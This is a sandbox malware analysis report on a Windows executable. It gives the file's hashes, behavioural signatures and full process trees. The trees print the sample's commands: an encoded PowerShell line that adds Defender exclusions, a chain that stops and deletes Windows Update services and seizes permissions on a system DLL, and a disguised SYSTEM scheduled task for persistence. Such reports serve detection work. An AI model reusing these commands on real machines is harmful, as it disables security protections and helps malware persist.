Analysis

- Max time kernel: 300s
- Max time network: 306s
- Platform: windows10_x64
- Resource: win10-20220414-en
- Submitted: 10-05-2022 22:21

Static task: static1
Behavioral task: behavioral1
Sample: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Resource: win7-20220414-en

General

- Target: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
- Size: 5.3MB
- MD5: 52fdd7f3ed1b50bc5794983a37cb4064
- SHA1: 4a185751e9e94dccb3330ca79f893de7ca080482
- SHA256: e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
- SHA512: 4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
Malware Config
Signatures
Modifies security service (2 TTPs, 5 IoCs)
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1
- reg.exe: Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo
Executes dropped EXE (1 IoC)
- PID 1604 services.exe
Possible privilege escalation attempt (4 IoCs)
- PID 2268 takeown.exe
- PID 1280 icacls.exe
- PID 3708 takeown.exe
- PID 2396 icacls.exe

Stops running service(s) (3 TTPs)
Modifies file permissions (1 TTP, 4 IoCs)
- PID 2268 takeown.exe
- PID 1280 icacls.exe
- PID 3708 takeown.exe
- PID 2396 icacls.exe
Drops file in System32 directory (3 IoCs)
- powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- powershell.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- conhost.exe: File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Suspicious use of SetThreadContext (1 IoC)
- PID 3836 conhost.exe set thread context of PID 940 conhost.exe
Drops file in Program Files directory (2 IoCs)
- conhost.exe: File opened for modification C:\Program Files\Windows\services.exe
- conhost.exe: File created C:\Program Files\Windows\services.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS (52 IoCs)
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- conhost.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
- powershell.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
- conhost.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
- powershell.exe: Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000
- powershell.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- conhost.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- conhost.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- powershell.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- powershell.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
- conhost.exe: Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
- powershell.exe: Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
Modifies registry key (1 TTP, 18 IoCs)
- reg.exe PIDs: 2120, 3472, 2288, 1172, 3472, 308, 2404, 2180, 2120, 500, 2196, 3660, 420, 1524, 3644, 160, 3656, 2128
Suspicious behavior: EnumeratesProcesses (8 IoCs)
- PID 3944 powershell.exe (3 entries)
- PID 1852 conhost.exe
- PID 2372 powershell.exe (3 entries)
- PID 3836 conhost.exe
Suspicious use of AdjustPrivilegeToken (39 IoCs)
- PID 3944 powershell.exe: Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 1852 conhost.exe: Token: SeDebugPrivilege
- PID 2268 takeown.exe: Token: SeTakeOwnershipPrivilege
- PID 2372 powershell.exe: Token: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- PID 3836 conhost.exe: Token: SeDebugPrivilege
- PID 3708 takeown.exe: Token: SeTakeOwnershipPrivilege
Suspicious use of WriteProcessMemory (64 IoCs)
- PID 1780 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe wrote to memory of PID 1852 conhost.exe (3 entries)
- PID 1852 conhost.exe wrote to memory of PID 4012 cmd.exe (2 entries)
- PID 4012 cmd.exe wrote to memory of PID 3944 powershell.exe (2 entries)
- PID 1852 conhost.exe wrote to memory of PID 1144 cmd.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 540 sc.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 2212 sc.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 3160 sc.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 492 sc.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 420 sc.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 2120 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 1172 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 3472 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 308 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 160 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 2268 takeown.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 1280 icacls.exe (2 entries)
- PID 1852 conhost.exe wrote to memory of PID 2900 cmd.exe (2 entries)
- PID 2900 cmd.exe wrote to memory of PID 3720 schtasks.exe (2 entries)
- PID 1852 conhost.exe wrote to memory of PID 2948 cmd.exe (2 entries)
- PID 2948 cmd.exe wrote to memory of PID 1212 schtasks.exe (2 entries)
- PID 1604 services.exe wrote to memory of PID 3836 conhost.exe (3 entries)
- PID 3836 conhost.exe wrote to memory of PID 1580 cmd.exe (2 entries)
- PID 1580 cmd.exe wrote to memory of PID 2372 powershell.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 2404 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 3660 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 2180 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 3656 reg.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 3880 schtasks.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 3684 schtasks.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 2640 schtasks.exe (2 entries)
- PID 1144 cmd.exe wrote to memory of PID 540 schtasks.exe (2 entries)
Processes

The tree below lists each process with its image path, full command line and nesting level; the signatures that fired on that process follow it.

- [1] C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\conhost.exe
    Command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"
    Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
        Decoded (base64 of UTF-16LE; the <#...#> blocks are empty PowerShell comments used as padding): Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop UsoSvc
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop WaaSMedicSvc
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop wuauserv
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop bits
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop dosvc
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        Signatures: Modifies security service; Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\takeown.exe
        Command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\icacls.exe
        Command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - [3] C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\schtasks.exe
        Command: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        Signatures: Creates scheduled task(s)
    - [3] C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\schtasks.exe
        Command: schtasks /run /tn "GoogleUpdateTaskMachineQC"

- [1] C:\Program Files\Windows\services.exe
  Command: "C:\Program Files\Windows\services.exe"
  Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\conhost.exe
    Command: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
    Signatures: Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"
        Decoded: same Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force command as in the first process tree
        Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop UsoSvc
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop WaaSMedicSvc
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop wuauserv
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop bits
      - [4] C:\Windows\system32\sc.exe
        Command: sc stop dosvc
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\takeown.exe
        Command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\system32\icacls.exe
        Command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        Signatures: Possible privilege escalation attempt; Modifies file permissions
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        Signatures: Modifies registry key
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - [4] C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - [3] C:\Windows\System32\conhost.exe
